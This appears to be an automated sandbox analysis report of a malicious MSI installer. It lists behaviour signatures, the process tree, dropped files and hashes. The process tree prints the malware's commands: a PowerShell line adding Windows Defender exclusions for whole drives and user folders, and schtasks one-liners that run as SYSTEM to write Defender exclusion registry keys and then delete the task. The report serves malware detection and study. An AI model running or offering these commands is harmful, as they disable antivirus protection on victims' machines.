Analysis

  • max time kernel
    147s
  • max time network
    152s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    01/08/2026, 04:25

General

  • Target
    install_c0rd006.msi
  • Size 9.8MB
  • Sample260801-e16hmadf38
  • SHA256 4302a9aa3bce51f552e580f24a2fa3d6cf9b05c28fd6229ac5bb03faf52a064c
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Badlisted process makes network request 6 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 4 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 7 IoCs
  • Drops file in Windows directory 13 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Executes a command shell one-liner 1 TTPs 3 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 22 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\install_c0rd006.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:3180
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:5188
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1692
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 7BB8F76A7A06369BC82749337691D8FE E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:440
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:4368
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k GPSvcGroup
    1⤵
      PID:3516
    • C:\Users\Public\YbinUD\QAMtJm.exe
      "C:\Users\Public\YbinUD\QAMtJm.exe"
      1⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Adds Run key to start application
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2888
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)','C:\' -Force
        2⤵
        • Command and Scripting Interpreter: PowerShell
        PID:2684
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\YbinUD\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
        2⤵
        • Indicator Removal: Clear Persistence
        • Suspicious use of WriteProcessMemory
        PID:1512
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\YbinUD\" /t REG_DWORD /d 0 /f"
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:3612
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Run /TN "Task1"
          3⤵
            PID:3276
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Delete /TN "Task1" /F
            3⤵
              PID:4632
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
            2⤵
            • Indicator Removal: Clear Persistence
            PID:4564
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
              3⤵
              • Scheduled Task/Job: Scheduled Task
              PID:2764
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Run /TN "Task1"
              3⤵
                PID:5988
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Delete /TN "Task1" /F
                3⤵
                  PID:2868
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                2⤵
                • Indicator Removal: Clear Persistence
                PID:1996
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                  3⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:2316
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Run /TN "Task1"
                  3⤵
                    PID:2596
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Delete /TN "Task1" /F
                    3⤵
                      PID:2196
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                    2⤵
                    • Indicator Removal: Clear Persistence
                    PID:3804
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                      3⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:3624
                • C:\Windows\system32\cmd.exe
                  "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\YbinUD" /t REG_DWORD /d 0 /f
                  1⤵
                  • Executes a command shell one-liner
                  PID:2648
                  • C:\Windows\System32\reg.exe
                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\YbinUD" /t REG_DWORD /d 0 /f
                    2⤵
                      PID:4364
                  • C:\Windows\system32\cmd.exe
                    cmd.exe
                    1⤵
                      PID:2972
                    • C:\Windows\system32\cmd.exe
                      "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                      1⤵
                      • Executes a command shell one-liner
                      PID:2164
                    • C:\Windows\system32\cmd.exe
                      "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                      1⤵
                      • Executes a command shell one-liner
                      PID:1092

                    Network

                          MITRE ATT&CK Enterprise v16

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          e5935cd.rbs

                          • Path C:\Config.Msi\e5935cd.rbs
                          • Size 7KB
                          • SHA256 b03befa92fd969763169b9e4e424b9de24c9f5a55e733f6a93c1ac7dc9e4bfdc
                          • MD5 SHA1 SHA512 SSDEEP TLSH

                          QAMtJm.exe

                          • Path C:\Users\Public\YbinUD\QAMtJm.exe
                          • Size 135KB
                          • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                          • MD5 SHA1 SHA512 SSDEEP TLSH

                          UxEnhance64.dll

                          • Path C:\Users\Public\YbinUD\UxEnhance64.dll
                          • Size 3.1MB
                          • SHA256 c1d955f73f902c9ea98a2441e8cdd6a1f127af48e9064b30fec33e6cf7b69d3d
                          • MD5 SHA1 SHA512 SSDEEP TLSH

                          adoresd.dat

                          • Path C:\Users\Public\YbinUD\adoresd.dat
                          • Size 4.7MB
                          • SHA256 07595de2362c27108fd736f1b9035711ddb3cd5c5b20cbc7da1b04e3ff9d5d9d
                          • MD5 SHA1 SHA512 SSDEEP TLSH

                          msadox.tb

                          • Path C:\Users\Public\YbinUD\msadox.tb
                          • Size 8KB
                          • SHA256 635cfe4e1ae6556353b8e2464669b8f4a1733d5da046d999e4f1aa04dbd7c4d0
                          • MD5 SHA1 SHA512 SSDEEP TLSH

                          MSI3D20.tmp

                          • Path C:\Windows\Installer\MSI3D20.tmp
                          • Size 9.7MB
                          • SHA256 98f0553a18e9ee4fcb390dfbf84504ce7103ea81134baba64304b92eb383a7f8
                          • MD5 SHA1 SHA512 SSDEEP TLSH

                          e5935cc.msi

                          • Path C:\Windows\Installer\e5935cc.msi
                          • Size 9.8MB
                          • SHA256 4302a9aa3bce51f552e580f24a2fa3d6cf9b05c28fd6229ac5bb03faf52a064c
                          • MD5 SHA1 SHA512 SSDEEP TLSH

                          metadata-2

                          • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                          • Size 26.1MB
                          • SHA256 a8667e7d915f382de2df87d897f2eb422b045cf61440de93dece1f3a13156cb2
                          • MD5 SHA1 SHA512 SSDEEP TLSH

                          {16db82a6-99f8-4305-8f53-9a6486411984}_OnDiskSnapshotProp

                          • Path \??\Volume{c576ab2f-0000-0000-0000-d08302000000}\System Volume Information\SPP\OnlineMetadataCache\{16db82a6-99f8-4305-8f53-9a6486411984}_OnDiskSnapshotProp
                          • Size 6KB
                          • SHA256 8debbf465c8ec2c747eb26dcba675192ec7d06432e100d765001091263ac6b0c
                          • MD5 SHA1 SHA512 SSDEEP TLSH

                          memory/440-48-0x00007FFF4FC10000-0x00007FFF4FC22000-memory.dmp

                          memory/440-16-0x00007FFF4FC10000-0x00007FFF4FC22000-memory.dmp

                          memory/440-13-0x00007FFF426E0000-0x00007FFF42D14000-memory.dmp

                          memory/440-12-0x00007FFF66630000-0x00007FFF66632000-memory.dmp

                          memory/2684-112-0x0000014FDD580000-0x0000014FDD5A2000-memory.dmp

                          memory/2888-74-0x0000024CC12E0000-0x0000024CC1B71000-memory.dmp

                          memory/2888-89-0x0000024CC12E0000-0x0000024CC1B71000-memory.dmp

                          memory/2888-68-0x00007FFF66630000-0x00007FFF66632000-memory.dmp

                          memory/2888-76-0x00007FFF66640000-0x00007FFF66642000-memory.dmp

                          memory/2888-81-0x0000024CC12E0000-0x0000024CC1B71000-memory.dmp

                          memory/2888-77-0x0000024CC12E0000-0x0000024CC1B71000-memory.dmp

                          memory/2888-82-0x0000024CC12E0000-0x0000024CC1B71000-memory.dmp

                          memory/2888-83-0x0000024CC12E0000-0x0000024CC1B71000-memory.dmp

                          memory/2888-84-0x0000024CC12E0000-0x0000024CC1B71000-memory.dmp

                          memory/2888-69-0x00007FFF42800000-0x00007FFF42D1E000-memory.dmp

                          memory/2888-95-0x0000024CBF110000-0x0000024CBF15E000-memory.dmp

                          memory/2888-100-0x0000024CC1C60000-0x0000024CC1CEA000-memory.dmp

                          memory/2888-99-0x0000024CC1C60000-0x0000024CC1CEA000-memory.dmp

                          memory/2888-98-0x0000024CC1C60000-0x0000024CC1CEA000-memory.dmp

                          memory/2888-96-0x0000024CC1C60000-0x0000024CC1CEA000-memory.dmp

                          memory/2888-102-0x0000024CC12E0000-0x0000024CC1B71000-memory.dmp

                          memory/2888-105-0x0000024CC12E0000-0x0000024CC1B71000-memory.dmp

                          memory/2888-106-0x0000024CC12E0000-0x0000024CC1B71000-memory.dmp

                          memory/5188-17-0x00000124E8ED0000-0x00000124E9874000-memory.dmp